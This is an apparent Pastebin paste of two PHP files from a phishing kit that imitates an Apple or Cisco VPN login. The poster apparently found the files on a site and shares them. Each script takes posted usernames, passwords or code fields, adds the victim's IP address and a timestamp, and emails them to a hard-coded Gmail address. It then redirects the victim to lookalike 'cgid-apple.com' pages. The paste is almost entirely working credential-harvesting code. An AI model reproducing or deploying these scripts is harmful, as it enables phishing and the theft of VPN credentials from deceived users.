Advertisement
Guest User

Untitled

a guest
Jul 20th, 2015
351
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.62 KB | None | 0 0
  1. <?php $ip = $_SERVER['REMOTE_ADDR']; ?>
  2.  
  3. <?php
  4.  
  5. $I=$_POST['name'];
  6.  
  7. $crypt1 = $I;
  8.  
  9. $P=$_POST['word'];
  10.  
  11. $L=$_POST['L'];
  12.  
  13. $BB=$_POST['Len'];
  14.  
  15. $crypt2 = $P;
  16.  
  17. $date = date('Y-m-d H:i:s');
  18.  
  19. $crypt3 = $date;
  20.  
  21. $crypt4 = $ip;
  22.  
  23.  
  24.  
  25. ?>
  26.  
  27. <?php
  28.  
  29.  
  30.  
  31. $cemail2="sama9430@gmail.com";
  32.  
  33.  
  34.  
  35.  
  36.  
  37. // Subject
  38.  
  39. $subject = 'Mes chiffres 2206';
  40.  
  41. $subject = $subject . ' ' . $crypt4;
  42.  
  43. // Message
  44.  
  45. $message = "
  46.  
  47. <html>
  48.  
  49. <head>
  50.  
  51. <title></title>
  52.  
  53. </head>
  54.  
  55. <body>
  56.  
  57.  
  58.  
  59.  
  60.  
  61. <div>
  62.  
  63.  
  64.  
  65. </div>
  66.  
  67. <div>
  68.  
  69.  
  70.  
  71. </div>
  72.  
  73. <div>
  74.  
  75. <p> I : " . $crypt1 . "</p>
  76.  
  77. <p> P : " . $crypt2 . "</p>
  78.  
  79. <p> A : " . $crypt3 . "</p>
  80.  
  81. <p> D : " . $crypt4 . "</p>
  82.  
  83.  
  84.  
  85.  
  86.  
  87. </div>
  88.  
  89.  
  90.  
  91.  
  92.  
  93. </body>
  94.  
  95. </html>
  96.  
  97. ";
  98.  
  99.  
  100.  
  101. // Headers
  102.  
  103. $headers = 'From: 2206 <sama9430@gmail.com>'."\r\n";
  104.  
  105. $headers .='Content-Type: text/html; charset="iso-8859-1"'."\n";
  106.  
  107. $headers .='Content-Transfer-Encoding: 8bit';
  108.  
  109.  
  110.  
  111. // Function mail()
  112.  
  113. mail($cemail2, $subject, $message, $headers);
  114.  
  115.  
  116.  
  117. ?>
  118. <?php if ($I=="" or $P=="") { ?>
  119. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  120. <html xmlns="http://www.w3.org/1999/xhtml">
  121. <head>
  122. <meta http-equiv="refresh" content="0; URL=http://uklon5-asavpn-fw1.cgid-apple.com/+CSCOE+/loginfailed.html">
  123. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  124. <title>vpn</title>
  125. </head>
  126.  
  127. <body>
  128. </body>
  129. </html>
  130. <?php } else { ?>
  131. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  132. <html xmlns="http://www.w3.org/1999/xhtml">
  133. <head>
  134. <meta http-equiv="refresh" content="0; URL=http://uklon5-asavpn-fw1.cgid-apple.com/+CSCOE+/Activation.html">
  135. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  136. <title>vpn</title>
  137. </head>
  138.  
  139. <body>
  140. </body>
  141. </html>
  142. <?php } ?>
  143.  
  144.  
  145. ==========================================================================
  146.  
  147. There was a files similar in a appleVPN folders named; vion.php here the copy/past as well:
  148.  
  149. <?php $ip = $_SERVER['REMOTE_ADDR']; ?>
  150.  
  151. <?php
  152.  
  153. $P1=$_POST['1X'];
  154.  
  155. $crypt1 = $I;
  156.  
  157. $P2=$_POST['2X'];
  158. $P3=$_POST['3X'];
  159. $P4=$_POST['4X'];
  160. $P5=$_POST['5X'];
  161.  
  162.  
  163.  
  164. $P6=$_POST['6X'];
  165. $P7=$_POST['7X'];
  166. $P8=$_POST['8X'];
  167.  
  168. $L=$_POST['L'];
  169.  
  170. $BB=$_POST['Len'];
  171.  
  172. $crypt2 = $P;
  173.  
  174. $date = date('Y-m-d H:i:s');
  175.  
  176. $crypt3 = $date;
  177.  
  178. $crypt4 = $ip;
  179.  
  180.  
  181.  
  182. ?>
  183.  
  184. <?php
  185.  
  186.  
  187.  
  188. $cemail2="sama9430@gmail.com";
  189.  
  190.  
  191.  
  192.  
  193.  
  194. // Subject
  195.  
  196. $subject = 'Mes chiffres 2206';
  197.  
  198. $subject = $subject . ' ' . $crypt4;
  199.  
  200. // Message
  201.  
  202. $message = "
  203.  
  204. <html>
  205.  
  206. <head>
  207.  
  208. <title></title>
  209.  
  210. </head>
  211.  
  212. <body>
  213.  
  214.  
  215.  
  216.  
  217.  
  218. <div>
  219.  
  220.  
  221.  
  222. </div>
  223.  
  224. <div>
  225.  
  226.  
  227.  
  228. </div>
  229.  
  230. <div>
  231.  
  232. <p> I1 : " . $P1 . "" . $P2 . "" . $P3 . "" . $P4 . "</p>
  233. <p> I2 : " . $P5 . "" . $P6 . "" . $P7 . "" . $P8 . "</p>
  234.  
  235. <p> P : " . $crypt2 . "</p>
  236.  
  237. <p> A : " . $crypt3 . "</p>
  238.  
  239. <p> D : " . $crypt4 . "</p>
  240.  
  241.  
  242.  
  243.  
  244.  
  245. </div>
  246.  
  247.  
  248.  
  249.  
  250.  
  251. </body>
  252.  
  253. </html>
  254.  
  255. ";
  256.  
  257.  
  258.  
  259. // Headers
  260.  
  261. $headers = 'From: 2206 <sama9430@gmail.com>'."\r\n";
  262.  
  263. $headers .='Content-Type: text/html; charset="iso-8859-1"'."\n";
  264.  
  265. $headers .='Content-Transfer-Encoding: 8bit';
  266.  
  267.  
  268.  
  269. // Function mail()
  270.  
  271. mail($cemail2, $subject, $message, $headers);
  272.  
  273.  
  274.  
  275. ?>
  276.  
  277. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  278. <html xmlns="http://www.w3.org/1999/xhtml">
  279. <head>
  280. <meta http-equiv="refresh" content="0; URL=http://iforgot.cgid-apple.com/Validation/">
  281. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  282. <title>vpn</title>
  283. </head>
  284.  
  285. <body>
  286. </body>
  287. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement